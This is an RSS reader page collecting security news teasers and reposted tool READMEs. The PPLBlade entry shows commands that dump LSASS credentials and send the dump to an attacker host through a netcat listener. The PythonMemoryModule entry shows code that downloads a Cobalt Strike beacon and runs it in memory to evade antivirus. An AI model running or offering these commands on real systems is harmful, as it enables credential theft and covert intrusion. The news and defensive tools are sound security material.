FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
☷
β–³ πŸ”ƒ
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

Google Chrome Adds V8 Sandbox - A New Defense Against Browser Attacks

By: Newsroom
Google has announced support for what's called a V8 Sandbox in the Chrome web browser in an effort to address memory corruption issues. The sandbox, according to V8 security technical lead Samuel Groß, aims to prevent "memory corruption in V8 from spreading within the host process." The search behemoth has described V8 Sandbox as a lightweight, in-process sandbox

New ZenHammer Attack Bypasses RowHammer Defenses on AMD CPUs

By: Newsroom
Cybersecurity researchers from ETH Zurich have developed a new variant of the RowHammer DRAM (dynamic random-access memory) attack that, for the first time, successfully works against AMD Zen 2 and Zen 3 systems despite mitigations such as Target Row Refresh (TRR). "This result proves that AMD systems are equally vulnerable to Rowhammer as Intel systems, which greatly increases the attack

Big-Name Targets Push Midnight Blizzard Hacking Spree Back Into the Limelight

By: Lily Hay Newman
Newly disclosed breaches of Microsoft and Hewlett-Packard Enterprise highlight the persistent threat posed by Midnight Blizzard, a notorious Russian cyber-espionage group.

A Flaw in Millions of Apple, AMD, and Qualcomm GPUs Could Expose AI Data

By: Lily Hay Newman, Matt Burgess
Patching every device affected by the LeftoverLocals vulnerabilityβ€”which includes some iPhones, iPads, and Macsβ€”may prove difficult.

PPLBlade - Protected Process Dumper Tool

By: Zion3R


Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

Overview of the techniques, used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.

It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.

Modes:

  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert obfuscated(--obfuscate) dump file to its original state
  3. Cleanup - Do cleanup manually, in case something goes wrong on execution (Note that the option values should be the same as for the execution, we're trying to clean up)
  4. DoThatLsassThing - Dump lsass.exe using Process Explorer driver (basic poc)

Handle Modes:

  1. Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
  2. Procexp - Uses PROCEXP152.sys to obtain a handle
Examples:

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade


Hackers Exploiting MS Excel Vulnerability to Spread Agent Tesla Malware

By: Newsroom
Attackers are weaponizing an old Microsoft Office vulnerability as part of phishing campaigns to distribute a strain of malware called Agent Tesla. The infection chains leverage decoy Excel documents attached in invoice-themed messages to trick potential targets into opening them and activate the exploitation of CVE-2017-11882 (CVSS score: 7.8), a memory corruption vulnerability in Office's

Blackbone - Windows Memory Hacking Library

By: Zion3R


Windows memory hacking library

Features

  • x86 and x64 support

Process interaction

  • Manage PEB32/PEB64
  • Manage process through WOW64 barrier

Process Memory

  • Allocate and free virtual memory
  • Change memory protection
  • Read/Write virtual memory

Process modules

  • Enumerate all (32/64 bit) modules loaded. Enumerate modules using Loader list/Section objects/PE headers methods.
  • Get exported function address
  • Get the main module
  • Unlink module from loader lists
  • Inject and eject modules (including pure IL images)
  • Inject 64bit modules into WOW64 processes
  • Manually map native PE images

Threads

  • Enumerate threads
  • Create and terminate threads. Support for cross-session thread creation.
  • Get thread exit code
  • Get main thread
  • Manage TEB32/TEB64
  • Join threads
  • Suspend and resume threads
  • Set/Remove hardware breakpoints

Pattern search

  • Search for arbitrary pattern in local or remote process

Remote code execution

  • Execute functions in remote process
  • Assemble own code and execute it remotely
  • Support for cdecl/stdcall/thiscall/fastcall conventions
  • Support for arguments passed by value, pointer or reference, including structures
  • FPU types are supported
  • Execute code in new thread or any existing one

Remote hooking

  • Hook functions in remote process using int3 or hardware breakpoints
  • Hook functions upon return

Manual map features

  • x86 and x64 image support
  • Mapping into any arbitrary unprotected process
  • Section mapping with proper memory protection flags
  • Image relocations (only 2 types supported. I haven't seen a single PE image with some other relocation types)
  • Imports and Delayed imports are resolved
  • Bound import is resolved as a side effect, I think
  • Module exports
  • Loading of forwarded export images
  • Api schema name redirection
  • SxS redirection and isolation
  • Activation context support
  • Dll path resolving similar to native load order
  • TLS callbacks. Only for one thread and only with PROCESS_ATTACH/PROCESS_DETACH reasons.
  • Static TLS
  • Exception handling support (SEH and C++)
  • Adding module to some native loader structures(for basic module api support: GetModuleHandle, GetProcAdress, etc.)
  • Security cookie initialization
  • C++/CLI images are supported
  • Image unloading
  • Increase reference counter for import libraries in case of manual import mapping
  • Cyclic dependencies are handled properly

Driver features

  • Allocate/free/protect user memory
  • Read/write user and kernel memory
  • Disable permanent DEP for WOW64 processes
  • Change process protection flag
  • Change handle access rights
  • Remap process memory
  • Hiding allocated user-mode memory
  • User-mode dll injection and manual mapping
  • Manual mapping of drivers

Requirements

  • Visual Studio 2017 15.7 or higher
  • Windows SDK 10.0.17134 or higher
  • WDK 10.0.17134 or higher (driver only)
  • VC++ 2017 Libs for Spectre (x86 and x64)
  • Visual C++ ATL (x86/x64) with Spectre Mitigations


PythonMemoryModule - Pure-Python Implementation Of MemoryModule Technique To Load Dll And Unmanaged Exe Entirely From Memory

By: Zion3R


"Python memory module" AI generated pic - hotpot.ai


pure-python implementation of MemoryModule technique to load a dll or unmanaged exe entirely from memory

What is it

PythonMemoryModule is a Python ctypes porting of the MemoryModule technique originally published by Joachim Bauch. It can load a dll or unmanaged exe using Python without requiring the use of an external library (pyd). It leverages pefile to parse PE headers and ctypes.

The tool was originally thought to be used as a Pyramid module to provide evasion against AV/EDR by loading dll/exe payloads in python.exe entirely from memory, however other use-cases are possible (IP protection, pyds in-memory loading, spinoffs for other stealthier techniques) so I decided to create a dedicated repo.


Why it can be useful

  1. It basically allows to use the MemoryModule techinque entirely in Python interpreted language, enabling the loading of a dll from a memory buffer using the stock signed python.exe binary without requiring dropping on disk external code/libraries (such as pymemorymodule bindings) that can be flagged by AV/EDRs or can raise user's suspicion.
  2. Using MemoryModule technique in compiled languages loaders would require to embed MemoryModule code within the loaders themselves. This can be avoided using Python interpreted language and PythonMemoryModule since the code can be executed dynamically and in memory.
  3. you can get some level of Intellectual Property protection by dynamically in-memory downloading, decrypting and loading dlls that should be hidden from prying eyes. Bear in mind that the dlls can be still recovered from memory and reverse-engineered, but at least it would require some more effort by the attacker.
  4. you can load a stageless payload dll without performing injection or shellcode execution. The loading process mimics the LoadLibrary Windows API (which takes a path on disk as input) without actually calling it and operating in memory.

How to use it

In the following example a Cobalt Strike stageless beacon dll is downloaded (not saved on disk), loaded in memory and started by calling the entrypoint.

import urllib.request
import ctypes
import pythonmemorymodule
request = urllib.request.Request('http://192.168.1.2/beacon.dll')
result = urllib.request.urlopen(request)
buf=result.read()
dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)
startDll = dll.get_proc_addr('StartW')
assert startDll()
#dll.free_library()

Note: if you use staging in your malleable profile the dll would not be able to load with LoadLibrary, hence MemoryModule won't work.

How to detect it

Using the MemoryModule technique will mostly respect the sections' permissions of the target DLL and avoid the noisy RWX approach. However within the program memory there will be a private commit not backed by a dll on disk and this is a MemoryModule telltale.

Future improvements

  1. add support for argument parsing.
  2. add support (basic) for .NET assemblies execution.


OpenSSL fixes High Severity data-stealing bug – patch now!

By: Paul Ducklin
7 memory mismanagements and a timing attack. We explain all the jargon bug terminology in plain English...

Heap_Detective - The Simple Way To Detect Heap Memory Pitfalls In C++ And C

By: noreply@blogger.com (Unknown)


This tool uses the taint analysis technique for static analysis and aims to identify points of heap memory usage vulnerabilities in C and C++ languages. The tool uses a common approach in the first phase of static analysis, using tokenization to collect information.

The second phase has a different approach to common lessons of the legendary dragon book, yes the tool doesn't use AST or resources like LLVM following parsers' and standard tips. The approach present aims to study other ways to detect vulnerabilities, using custom vector structures and typical recursive traversal with ranking following taint point. So the result of the sum of these techniques is the Heap_detective.

The tool follows the KISS principle "Keep it simple, stupid!". There's more than one way to do a SAST tool, I know that. Yes, I thought to use graph database or AST, but this action cracked the KISS principle in the context of this project.

https://antonio-cooler.gitbook.io/coolervoid-tavern/detecting-heap-memory-pitfalls


Features

  • C and C++ tokenizer
  • List of heap static routes for each source with taint points for analysis
  • Analyser to detect double free vulnerability
  • Analyser to detect use after free vulnerability
  • Analyser to detect memory leak

To test, read the directory samplers to understand the context, so to run look that following:

$ git clone https://github.com/CoolerVoid/heap_detective

$ cd heap_detective

$ make
// to run
$ bin/heap_detective samplers/   
note:
So don't try "$ cd bin; ./heap_detective"
first argv is a directory for recursive analysis

Note: tested in GCC 9 and 11

The first argument by command is a directory for recursive analysis. You can study bad practices in directory "samplers".

Future features

  • Analyser to detect off-by-one vulnerability
  • Analyser to detect wild pointer
  • Analyser to detect heap overflow vulnerability

Overview

Output example:




Collect action done

  ...::: Heap static route :::...  
File path: samplers/example3.c
Func name: main
Var name: new
line: 10:	array = new obj[100];
Sinks: 
	 line: 10:	array = new obj[100];
	 Taint:  True 
	 In Loop: false

  ...::: Heap static route :::...  
File path: samplers/example3.c
Func name: 	while
Var name: array
line: 27:	array = malloc(1);
Sinks: 
	 line: 27:	array = malloc(1);
	 Taint:  True 
	 In Loop: false
	 line: 28:	array=2;
	 Taint: false
	 In Loop: false
	 line: 30:	array = malloc(3);
	 Taint:  True 
	 In Loop: false

  ...::: Heap static route :::...  
File path: samplers/example5.c
Func name: main
Var name: ch_ptr
line: 8:	ch_ptr = malloc(100);
Sinks: 
	 line: 8:	ch_ptr = malloc(100);
	 Taint:  True 
	 In Loop: false
	 line: 11:	free(ch_ptr);	
	 Taint:  True 
	 In Loop: false<   br/>	 line: 12:	free(ch_ptr);
	 Taint:  True 
	 In Loop: false

  ...::: Heap static route :::...  
File path: samplers/example1.c
Func name: main
Var name: buf1R1
line: 13:    buf1R1 = (char *) malloc(BUFSIZER1);
Sinks: 
	 line: 13:    buf1R1 = (char *) malloc(BUFSIZER1);
	 Taint:  True 
	 In Loop: false
	 line: 26:    free(buf1R1);
	 Taint:  True 
	 In Loop: false
	 line: 30:    if (buf1R1) {
	 Taint: false
	 In Loop: false
	 line: 31:	free(buf1R1);
	 Taint:  True 
	 In Loop: false

  ...::: Heap static route :::...  
File path: samplers/example2.c
Func name: main
Var name: ch_ptr
line: 7:	ch_ptr=malloc(100);
Sinks: 
	 line: 7:	ch_ptr=malloc(100);
	 Taint:  True 
	 In Loop: false
	 line: 11:		ch_ptr = 'A';
	 Taint: false
	 In Loop:  True 
	 line: 12:		free(ch_ptr);
	 Taint:  True 
	 In Loop:  True 
	 line: 13:		printf("%s\n", ch_pt   r);
	 Taint: false
	 In Loop:  True 

  ...::: Heap static route :::...  
File path: samplers/example4.c
Func name: main
Var name: ch_ptr
line: 8:	ch_ptr = malloc(100);
Sinks: 
	 line: 8:	ch_ptr = malloc(100);
	 Taint:  True 
	 In Loop: false
	 line: 13:		ch_ptr = 'A';
	 Taint: false
	 In Loop: false
	 line: 14:		free(ch_ptr);
	 Taint:  True 
	 In Loop: false
	 line: 15:		printf("%s\n", ch_ptr);
	 Taint: false
	 In Loop: false

  ...::: Heap static route :::...  
File path: samplers/example6.c
Func name: main
Var name: ch_ptr
line: 8:	ch_ptr = malloc(100);
Sinks: 
	 line: 8:	ch_ptr = malloc(100);
	 Taint:  True 
	 In Loop: false
	 line: 11:	free(ch_ptr);
	 Taint:  True 
	 In Loop: false
	 line: 13:	ch_ptr = malloc(500);
	 Taint:  True 
	 In Loop: false

  ...::: Heap static route :::...  
File path: samplers/example7.c
Fu   nc name: special
Var name: ch_ptr
line: 8:	ch_ptr = malloc(100);
Sinks: 
	 line: 8:	ch_ptr = malloc(100);
	 Taint:  True 
	 In Loop: false
	 line: 15:		free(ch_ptr);	
	 Taint:  True 
	 In Loop: false
	 line: 16:		ch_ptr = malloc(500);
	 Taint:  True 
	 In Loop: false
	 line: 17:		ch_ptr=NULL;
	 Taint: false
	 In Loop: false
	 line: 25:	char *ch_ptr = NULL;
	 Taint: false
	 In Loop: false

  ...::: Heap static route :::...  
File path: samplers/example7.c
Func name: main
Var name: ch_ptr
line: 27:	ch_ptr = malloc(100);
Sinks: 
	 line: 27:	ch_ptr = malloc(100);
	 Taint:  True 
	 In Loop: false
	 line: 30:	free(ch_ptr);
	 Taint:  True 
	 In Loop: false
	 line: 32:	ch_ptr = malloc(500);
	 Taint:  True 
	 In Loop: false

>>-----> Memory leak analyser

  ...::: Memory leak analyser :::...  
File path: samplers/example3.c
F   unction name: main
 memory leak found!  
line: 10:	array = new obj[100];

  ...::: Memory leak analyser :::...  
File path: samplers/example3.c
Function name: 	while
 memory leak found!  
line: 27:	array = malloc(1);
line: 28:	array=2;
line: 30:	array = malloc(3);

  ...::: Memory leak analyser :::...  
File path: samplers/example5.c
Function name: main
 memory leak found!  
line: 8:	ch_ptr = malloc(100);
line: 11:	free(ch_ptr);	
line: 12:	free(ch_ptr);

  ...::: Memory leak analyser :::...  
File path: samplers/example1.c
Function name: main
 memory leak found!  
line: 13:    buf1R1 = (char *) malloc(BUFSIZER1);
line: 26:    free(buf1R1);
line: 30:    if (buf1R1) {
line: 31:	free(buf1R1);

  ...::: Memory leak analyser :::...  
File path: samplers/example2.c
Function name: main
 memory leak found!  
Maybe the function to liberate memory can be in a loo   p context!
line: 7:	ch_ptr=malloc(100);
line: 11:		ch_ptr = 'A';
line: 12:		free(ch_ptr);
line: 13:		printf("%s\n", ch_ptr);

  ...::: Memory leak analyser :::...  
File path: samplers/example6.c
Function name: main
 memory leak found!  
line: 8:	ch_ptr = malloc(100);
line: 11:	free(ch_ptr);
line: 13:	ch_ptr = malloc(500);

  ...::: Memory leak analyser :::...  
File path: samplers/example7.c
Function name: special
 memory leak found!  
line: 8:	ch_ptr = malloc(100);
line: 15:		free(ch_ptr);	
line: 16:		ch_ptr = malloc(500);
line: 17:		ch_ptr=NULL;
line: 25:	char *ch_ptr = NULL;

  ...::: Memory leak analyser :::...  
File path: samplers/example7.c
Function name: main
 memory leak found!  
line: 27:	ch_ptr = malloc(100);
line: 30:	free(ch_ptr);
line: 32:	ch_ptr = malloc(500);

>>-----> Start double free analyser

  ...::: Double free analys   er :::...  
File path: samplers/example5.c
Function name: main
 Double free found!  
line: 8:	ch_ptr = malloc(100);
line: 11:	free(ch_ptr);	
line: 12:	free(ch_ptr);

  ...::: Double free analyser :::...  
File path: samplers/example1.c
Function name: main
 Double free found!  
line: 13:    buf1R1 = (char *) malloc(BUFSIZER1);
line: 26:    free(buf1R1);
line: 30:    if (buf1R1) {
line: 31:	free(buf1R1);

  ...::: Double free analyser :::...  
File path: samplers/example2.c
Function name: main
 Double free found!  
Maybe the function to liberate memory can be in a loop context!
line: 7:	ch_ptr=malloc(100);
line: 11:		ch_ptr = 'A';
line: 12:		free(ch_ptr);
line: 13:		printf("%s\n", ch_ptr);

>>-----> Start use after free analyser

  ...::: Use after free analyser :::...  
File path: samplers/example5.c
Function name: main
 Use after free found  
l   ine: 8:	ch_ptr = malloc(100);
line: 11:	free(ch_ptr);	
line: 12:	free(ch_ptr);

  ...::: Use after free analyser :::...  
File path: samplers/example1.c
Function name: main
 Use after free found  
line: 13:    buf1R1 = (char *) malloc(BUFSIZER1);
line: 26:    free(buf1R1);
line: 30:    if (buf1R1) {
line: 31:	free(buf1R1);

  ...::: Use after free analyser :::...  
File path: samplers/example2.c
Function name: main
 Use after free found  
line: 7:	ch_ptr=malloc(100);
line: 11:		ch_ptr = 'A';
line: 12:		free(ch_ptr);
line: 13:		printf("%s\n", ch_ptr);

  ...::: Use after free analyser :::...  
File path: samplers/example4.c
Function name: main
 Use after free found  
line: 8:	ch_ptr = malloc(100);
line: 13:		ch_ptr = 'A';
line: 14:		free(ch_ptr);
line: 15:		printf("%s\n", ch_ptr);

  ...::: Use after free analyser :::...  
File path: samplers/example6.c
   Function name: main
 Use after free found  
line: 8:	ch_ptr = malloc(100);
line: 11:	free(ch_ptr);
line: 13:	ch_ptr = malloc(500);

  ...::: Use after free analyser :::...  
File path: samplers/example7.c
Function name: special
 Use after free found  
line: 8:	ch_ptr = malloc(100);
line: 15:		free(ch_ptr);	
line: 16:		ch_ptr = malloc(500);
line: 17:		ch_ptr=NULL;
line: 25:	char *ch_ptr = NULL;

  ...::: Use after free analyser :::...  
File path: samplers/example7.c
Function name: main
 Use after free found  
line: 27:	ch_ptr = malloc(100);
line: 30:	free(ch_ptr);
line: 32:	ch_ptr = malloc(500);






Collect-MemoryDump - Automated Creation Of Windows Memory Snapshots For DFIR

By: noreply@blogger.com (Unknown)


Collect-MemoryDump - Automated Creation of Windows Memory Snapshots for DFIR

Collect-MemoryDump.ps1 is PowerShell script utilized to collect a Memory Snapshot from a live Windows system (in a forensically sound manner).

Features:

  • Checks for Hostname and Physical Memory Size before starting memory acquisition
  • Checks if you have enough free disk space to save memory dump file
  • Collects a Raw Physical Memory Dump w/ DumpIt, Magnet Ram Capture, Belkasoft Live RAM Capturer and WinPMEM
  • Collects a Microsoft Crash Dump w/ DumpIt for Comae Beta from Magnet Idea Lab
  • Pagefile Collection w/ CyLR - Live Response Collection tool by Alan Orlikoski and Jason Yegge
  • Checks for Encrypted Volumes w/ Magnet Forensics Encrypted Disk Detector
  • Collects BitLocker Recovery Key
  • Checks for installed Endpoint Security Tools (AntiVirus and EDR)
  • Enumerates all necessary information from the target host to enrich your DFIR workflow
  • Creates a password-protected Secure Archive Container (PW: IncidentResponse)

First Public Release

MAGNET Talks - Frankfurt, Germany (July 27, 2022)
Presentation Title: Modern Digital Forensics and Incident Response Techniques
https://www.magnetforensics.com/

Download

Download the latest version of Collect-MemoryDump from the Releases section.

Note: Collect-MemoryDump does not include all external tools by default.

You have to download following dependencies:

Copy the required files to following file locations:

Belkasoft Live RAM Capturer
$SCRIPT_DIR\Tools\RamCapturer\x64\msvcp110.dll
$SCRIPT_DIR\Tools\RamCapturer\x64\msvcr110.dll
$SCRIPT_DIR\Tools\RamCapturer\x64\RamCapture64.exe
$SCRIPT_DIR\Tools\RamCapturer\x64\RamCaptureDriver64.sys
$SCRIPT_DIR\Tools\RamCapturer\x86\msvcp110.dll
$SCRIPT_DIR\Tools\RamCapturer\x86\msvcr110.dll
$SCRIPT_DIR\Tools\RamCapturer\x86\RamCapture.exe
$SCRIPT_DIR\Tools\RamCapturer\x86\RamCaptureDriver.sys

Comae-Toolkit
$SCRIPT_DIR\Tools\DumpIt\ARM64\DumpIt.exe
$SCRIPT_DIR\Tools\DumpIt\x64\DumpIt.exe
$SCRIPT_DIR\Tools\DumpIt\x86\DumpIt.exe

MAGNET Encrypted Disk Detector
$SCRIPT_DIR\Tools\EDD\EDDv310.exe

MAGNET Ram Capture
$SCRIPT_DIR\Tools\MRC\MRCv120.exe

Usage

.\Collect-MemoryDump.ps1 [-Tool] [--Pagefile]

Example 1 - Raw Physical Memory Snapshot
.\Collect-MemoryDump.ps1 -DumpIt

Example 2 - Microsoft Crash Dump (.zdmp) β†’ optimized for uploading to Comae Investigation Platform
.\Collect-MemoryDump.ps1 -Comae

Note: You can uncompress *.zdmp files generated by DumpIt w/ Z2Dmp (Comae-Toolkit).

Example 3 - Raw Physical Memory Snapshot and Pagefile Collection β†’ MemProcFS
.\Collect-MemoryDump.ps1 -WinPMEM --Pagefile

Fig 1: Help Message

Fig 2: Check Available Space

Fig 3: Automated Creation of Windows Memory Snapshot w/ DumpIt

Fig 4: Automated Creation of Windows Memory Snapshot w/ Magnet RAM Capture

Fig 5: Automated Creation of Windows Memory Snapshot w/ WinPMEM

Fig 6: Automated Creation of Windows Memory Snapshot w/ Belkasoft Live RAM Capturer

Fig 7: Automated Creation of Windows Memory Snapshot w/ DumpIt (Microsoft Crash Dump)

Fig 8: Automated Creation of Windows Memory Snapshot w/ WinPMEM and Pagefile Collection w/ CyLR

Fig 9: Message Box

Fig 10: Secure Archive Container (PW: IncidentResponse) and Logfile.txt

Fig 11: Output Directories

Fig 12: Memory Directories (WinPMEM and Pagefile)

Fig 13: Memory Snapshot (in a forensically sound manner)

Fig 14: Pagefile Collection

Fig 15: Collected System Information

Dependencies

7-Zip 22.01 Standalone Console (2022-07-15)
https://www.7-zip.org/download.html

Belkasoft Live RAM Capturer (2018-10-22)
https://belkasoft.com/ram-capturer

DumpIt 3.5.0 (2022-08-02) β†’ Comae-Toolkit
https://magnetidealab.com/
https://beta.comae.tech/

CyLR 3.0 (2021-02-03)
https://github.com/orlikoski/CyLR

Magnet Encrypted Disk Detector v3.1.0 (2022-06-19)
https://www.magnetforensics.com/resources/encrypted-disk-detector/
https://support.magnetforensics.com/s/free-tools

Magnet RAM Capture v1.2.0 (2019-07-24)
https://www.magnetforensics.com/resources/magnet-ram-capture/
https://support.magnetforensics.com/s/software-and-downloads?productTag=free-tools

PsLoggedOn v1.35 (2016-06-29)
https://docs.microsoft.com/de-de/sysinternals/downloads/psloggedon

WinPMEM 4.0 RC2 (2020-10-12)
https://github.com/Velocidex/WinPmem/releases

Links

Belkasoft Live RAM Capturer
Comae-Toolkit incl. DumpIt
CyLR - Live Response Collection Tool
MAGNET Encrypted Disk Detector
MAGNET Ram Capture
WinPMEM


MAGNET Idea Lab - Apply To Join



The Rise of Rust, the β€˜Viral’ Secure Programming Language That’s Taking Over Tech

By: Lily Hay Newman
Rust makes it impossible to introduce some of the most common security vulnerabilities. And its adoption can’t come soon enough.

Spyware Hunters Are Expanding Their Tool Set

By: Lily Hay Newman
This invasive malware isn’t just for phonesβ€”it can target your PC too. But a new batch of algorithms aims to weed out this threat.
❌